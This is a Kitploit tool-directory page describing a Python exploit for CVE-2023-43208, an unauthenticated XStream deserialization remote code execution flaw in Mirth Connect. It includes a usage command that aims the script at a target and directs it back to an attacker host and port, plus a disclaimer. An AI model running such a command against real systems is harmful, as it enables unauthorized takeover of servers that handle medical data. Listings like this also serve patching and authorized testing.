Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Mirth-Connect-CVE-2023-43208 — Python implementation of CVE-2023-43208 Mirth Connect RCE (Unauth XStream) | Kitploit
Tools/GitHubGitHub/azrvs/mirth-connect-cve-2023-43208
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed Teaming
GitHubazrvs/mirth-connect-cve-2023-43208

Mirth-Connect-CVE-2023-43208

Python implementation of CVE-2023-43208 Mirth Connect RCE (Unauth XStream)

View Repository
26 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2023-43208: Unauthenticated Remote Code Execution (RCE) in NextGen Mirth Connect

Python Version Vulnerability

This exploit leverages a critical deserialization vulnerability within Mirth Connect's XStream engine. It stems from an incomplete patch for CVE-2023-37679, enabling unauthenticated arbitrary code execution across all versions prior to 4.4.1.

Usage

root@kitploit:~
python3 mirth_rce.py https://{target} <attacker_host> <attacker_port>

Disclaimer

This exploit script is intended strictly for educational purposes and authorized security auditing to assist defenders in mitigating CVE-2023-43208; any use of this tool against unauthorized targets is illegal and the sole responsibility of the end user. The author provides this software "as is" without any warranties, disclaims all liability for potential misuse or damages, and does not condone or encourage unauthorized activities. Use at your own risk and only in compliance with applicable laws.

Download Tool